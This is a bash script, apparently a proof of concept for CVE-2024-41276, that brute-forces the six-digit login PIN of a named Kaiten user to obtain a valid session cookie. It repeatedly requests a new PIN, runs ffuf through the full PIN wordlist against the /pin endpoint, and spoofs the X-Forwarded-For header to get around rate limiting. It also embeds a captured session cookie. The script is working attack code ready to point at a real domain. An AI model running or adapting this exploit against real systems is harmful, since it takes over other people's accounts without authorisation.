#!/bin/bash
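# Function to display usage
#######################################
# Print the command-line synopsis and abort.
# Globals:   $0 (script name, read)
# Outputs:   the synopsis on stderr (not stdout, so it never pollutes
#            anything a caller captures from this script)
# Returns:   never; exits with status 1
#######################################
usage() {
  printf 'Usage: %s <username> <domain>\n' "$0" >&2
  exit 1
}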
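# Check if username and domain are provided
if [[ -z "$1" || -z "$2" ]]; then
  usage
fi
USERNAME=$1
DOMAIN=$2
# DOMAIN is spliced into request URLs and the Host/Origin/Referer headers
# below. Accept only a bare host[:port] so a stray "/", "?" or space in the
# argument cannot redirect the requests somewhere other than the target.
if [[ ! "$DOMAIN" =~ ^[A-Za-z0-9.-]+(:[0-9]+)?$ ]]; then
  printf 'Invalid domain: %s (expected host[:port])\n' "$DOMAIN" >&2
  exit 1
fi
# Nothing below reassigns these; freeze them so a typo cannot silently
# retarget a later request.
readonly USERNAME DOMAIN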
# Display banner
#######################################
# Print the coloured CVE banner that describes what this script does.
# Outputs:   seven lines on stdout, coloured with ANSI SGR escapes
# Returns:   0
#######################################
banner() {
  local esc=$'\e'
  local yellow="${esc}[1;33m" red="${esc}[1;31m" green="${esc}[1;32m"
  local cyan="${esc}[1;36m" magenta="${esc}[1;35m" reset="${esc}[0m"
  local rule='======================================================================'
  printf '%s\n' \
    "${yellow}${rule}" \
    "CVE-2024-41276 ${red}(Authentication Bypass in Kaiten)${reset}" \
    "${yellow}Attempting to guess the PIN code every 5 minutes" \
    "Rate limit Bypassed with the ${green}X-Forwarded-For${yellow} header." \
    "Approx time of success: With ${cyan}150 RPS ~ 4 hours${yellow}" \
    "Result: ${magenta}Obtain a valid cookie.${reset}" \
    "${yellow}${rule}${reset}"
}
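# Function to request a new PIN
#######################################
# Ask the login endpoint to issue a fresh PIN for USERNAME.
# Globals:   USERNAME, DOMAIN (read); KAITEN_COOKIE (read, optional: the
#            session cookie to send; defaults to the captured literal below)
# Outputs:   progress on stdout, errors on stderr
# Returns:   0 when the request was sent; exits 1 if the user is unknown,
#            the JSON could not be built, or curl itself failed
#######################################
request_pin() {
  local body response cookie
  echo "Requesting new PIN for user $USERNAME at domain $DOMAIN..."
  # Build the body with jq so the username is JSON-escaped. The previous
  # $"{"username":"$USERNAME"}" quoting paired the double quotes with each
  # other and actually sent {username:NAME}, which is not valid JSON.
  body=$(jq -cn --arg u "$USERNAME" '{username: $u}') \
    || { echo "Could not build JSON body for $USERNAME" >&2; exit 1; }
  cookie="${KAITEN_COOKIE:-connect.sid=s%3AMyHUxWALORASHD2eThTC8DRQNyDerlOS.oLlEUVqIBxjnInAluztpUAq3z3pzNYBGW5HaVAH05TU}"
  # Content-Length is left to curl: the former hard-coded "23" only matched
  # one username length and made the server wait for bytes that never came.
  # -k skips TLS verification (fine for a lab target, a MITM risk elsewhere);
  # -sS stays quiet but still reports transport errors.
  response=$(curl --path-as-is -sS -k -X POST \
    -H "Host: $DOMAIN" \
    -H 'Sec-Ch-Ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"' \
    -H 'Accept: application/json, text/plain, */*' \
    -H 'Sec-Ch-Ua-Platform: "Linux"' \
    -H 'Content-Type: application/json' \
    -H 'Sec-Ch-Ua-Mobile: ?0' \
    -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36' \
    -H 'App-Version: 57.128.8' \
    -H "Origin: https://$DOMAIN" \
    -H 'Sec-Fetch-Site: same-origin' \
    -H 'Sec-Fetch-Mode: cors' \
    -H 'Sec-Fetch-Dest: empty' \
    -H "Referer: https://$DOMAIN/login?redirectPath=%2F" \
    -H 'Accept-Encoding: gzip, deflate, br' \
    -H 'Accept-Language: en-US,en;q=0.9' \
    -H 'Priority: u=1, i' \
    -b "$cookie" \
    --data-binary "$body" \
    "https://$DOMAIN/login?redirectPath=%2F") \
    || { echo "PIN request to https://$DOMAIN failed (curl error)" >&2; exit 1; }
  # The endpoint signals an unknown user in the body; no point looping on it.
  if [[ "$response" == *"not found"* ]]; then
    echo "User does not exist."
    exit 1
  fi
}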
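# Function to brute force the PIN
# Timeout of 5 minutes because of expiration_time of cookie = 5 min, then we need to request again new PIN
#######################################
# Run ffuf against /pin for up to 5 minutes with every 6-digit PIN. The
# FUZZ value is also used as the last X-Forwarded-For octet so each guess
# arrives from a different "client" and the per-IP rate limit is sidestepped.
# Globals:   USERNAME, DOMAIN (read); KAITEN_COOKIE (read, optional: the
#            session cookie to send; defaults to the captured literal below)
# Outputs:   ffuf progress on stdout; writes ffuf_kaiten.json in the cwd
# Returns:   ffuf's / timeout's status; exits 1 if ffuf or the wordlist is
#            missing or the JSON body cannot be built
#######################################
brute_force_pin() {
  local wordlist=/usr/share/seclists/Fuzzing/6-digits-000000-999999.txt
  local body cookie
  command -v ffuf >/dev/null || { echo "ffuf not found in PATH" >&2; exit 1; }
  [[ -r "$wordlist" ]] || { echo "Wordlist not readable: $wordlist" >&2; exit 1; }
  # Build the body with jq so the username is JSON-escaped; ffuf substitutes
  # the literal FUZZ in the pin field (a username containing "FUZZ" would be
  # substituted too). The previous $"{"username":...}" quoting dropped the
  # inner double quotes and sent invalid JSON.
  body=$(jq -cn --arg u "$USERNAME" '{username: $u, pin: "FUZZ"}') \
    || { echo "Could not build JSON body for $USERNAME" >&2; exit 1; }
  cookie="${KAITEN_COOKIE:-connect.sid=s%3AMyHUxWALORASHD2eThTC8DRQNyDerlOS.oLlEUVqIBxjnInAluztpUAq3z3pzNYBGW5HaVAH05TU}"
  # Remove last round's results first: if ffuf dies before writing, a stale
  # file would otherwise be reported as a fresh hit.
  rm -f -- ffuf_kaiten.json
  echo "Starting brute force attack for user $USERNAME at domain $DOMAIN..."
  timeout 5m ffuf -noninteractive -w "$wordlist" \
    -u "https://$DOMAIN/pin" -X POST \
    -H "Cookie: $cookie" \
    -H "Content-Type: application/json" \
    -H "X-Forwarded-For: 127.0.0.FUZZ" \
    -d "$body" \
    -mc 200-299,301,302,307,405 -rate 1000 -t 500 -of json -o ffuf_kaiten.json
}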
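# Function to check the output of ffuf
#######################################
# Inspect ffuf_kaiten.json from the last round and stop on a hit.
# Outputs:   the matching ffuf results on stdout when a PIN was found;
#            a restart notice otherwise (warning on stderr if ffuf left
#            no usable output)
# Returns:   0 so the main loop continues; exits 0 when a PIN was found
#######################################
check_output() {
  local out=ffuf_kaiten.json
  # Missing or empty output means ffuf never wrote results (killed early,
  # bad wordlist, ...). Say so instead of silently reporting "no PIN".
  if [[ ! -s "$out" ]]; then
    echo "No ffuf output in $out, restarting the process..." >&2
    return 0
  fi
  # jq -e exits 0 only when the expression is true, i.e. at least one match.
  if jq -e '.results | length > 0' "$out" >/dev/null 2>&1; then
    echo "Valid PIN found!"
    jq '.results' "$out"
    exit 0
  fi
  echo "No valid PIN found, restarting the process..."
}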
# Main loop
banner
# Each round: have a fresh PIN issued, spend its lifetime guessing it, then
# inspect the ffuf results. check_output terminates the script on a hit, so
# the loop itself never ends on its own.
for (( ; ; )); do
  request_pin
  brute_force_pin
  check_output
done